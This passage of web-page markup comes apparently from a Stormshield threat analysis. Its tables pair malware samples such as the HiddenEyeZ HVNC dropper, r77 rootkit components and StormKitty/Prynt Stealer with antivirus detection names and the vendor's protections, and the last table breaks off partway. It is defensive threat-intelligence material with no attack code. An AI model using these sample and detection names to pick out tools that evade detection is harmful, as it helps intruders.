class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1219673\" class=\"desktop-view tr_class_1219673 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_70960868\" rowspan=\"1\" colspan=\"1\" class=\"td_class_70960868\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_70960868\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" 
style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Dropper from HiddenEyeZ<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85179042\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85179042\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85179042\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Gen:Trojan.Heur.DNP.Gm0@aK1dYYi<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3678292\" class=\"desktop-view tr_class_3678292 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_31122696\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31122696\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31122696\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; 
text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 64-bit DLL<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_29713965\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29713965\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29713965\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan.GenericKD.65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Stormshield Network Security protections via Breach Fighter<\/h3>\n<p>Here are the SNS signatures detecting the various samples via the Breach Fighter service:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" 
angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_11\"\n     id='ninja_table_builder_414267'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_11\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414267\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_7961592\" class=\"desktop-view tr_class_7961592 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_64932601\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64932601\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64932601\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_17372453\" rowspan=\"1\" colspan=\"1\" class=\"td_class_17372453\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_17372453\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" 
style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Breach Fighter detection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6947734\" class=\"desktop-view tr_class_6947734 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_86222568\" rowspan=\"1\" colspan=\"1\" class=\"td_class_86222568\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_86222568\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_55154146\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55154146\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55154146\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: 
rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Malveillant Trojan:MSILZilla\/25816<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5936108\" class=\"desktop-view tr_class_5936108 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_19128602\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19128602\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19128602\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC dropper<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_39001755\" rowspan=\"1\" colspan=\"1\" class=\"td_class_39001755\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_39001755\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/11609<\/span> <!----> <!----><\/div> <div 
class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8048583\" class=\"desktop-view tr_class_8048583 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_10895356\" rowspan=\"1\" colspan=\"1\" class=\"td_class_10895356\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_10895356\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_13344565\" rowspan=\"1\" colspan=\"1\" class=\"td_class_13344565\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_13344565\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/8938<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; 
margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5661301\" class=\"desktop-view tr_class_5661301 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_19884910\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19884910\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19884910\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">highlander.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61589106\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61589106\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61589106\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Marsilia\/20527.1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i 
class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8792755\" class=\"desktop-view tr_class_8792755 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_55621856\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55621856\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55621856\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - installer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_14225607\" rowspan=\"1\" colspan=\"1\" class=\"td_class_14225607\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_14225607\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:MSILHeracles\/32317<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5090304\" class=\"desktop-view tr_class_5090304 \" 
style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_48953366\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48953366\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48953366\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - dll x86<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_50627880\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50627880\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50627880\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Cerbu\/99363<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7446039\" class=\"desktop-view tr_class_7446039 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_82038898\" rowspan=\"1\" colspan=\"1\" class=\"td_class_82038898\" 
style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_82038898\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - dll x64<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_64816237\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64816237\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64816237\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:GenericKD\/65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2532925\" class=\"desktop-view tr_class_2532925 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_38924596\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38924596\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38924596\"><div 
class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - uninstaller<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_97253485\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97253485\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97253485\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">SUSPECT<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7375139\" class=\"desktop-view tr_class_7375139 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_18866327\" rowspan=\"1\" colspan=\"1\" class=\"td_class_18866327\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_18866327\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: 
normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">AddStartupTask.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_52803865\" rowspan=\"1\" colspan=\"1\" class=\"td_class_52803865\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_52803865\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Razy\/592822<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5078776\" class=\"desktop-view tr_class_5078776 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_50342371\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50342371\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50342371\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; 
line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66090308\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66090308\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66090308\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/24027<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Les protections Stormshield Endpoint Security Evolution<\/h3>\n<p>Voici pour chaque ex\u00e9cutable analys\u00e9, les protections apport\u00e9es par Stormshield Endpoint Securtity Evolution (SES).[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" 
background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_12\"\n     id='ninja_table_builder_414258'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_12\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414258\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6655394\" class=\"desktop-view tr_class_6655394 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_30972753\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30972753\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30972753\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_56260162\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56260162\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56260162\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; 
font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Rules set<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_20503072\" rowspan=\"1\" colspan=\"1\" class=\"td_class_20503072\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_20503072\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Protection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3028415\" class=\"desktop-view tr_class_3028415 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_16603208\" rowspan=\"1\" colspan=\"1\" 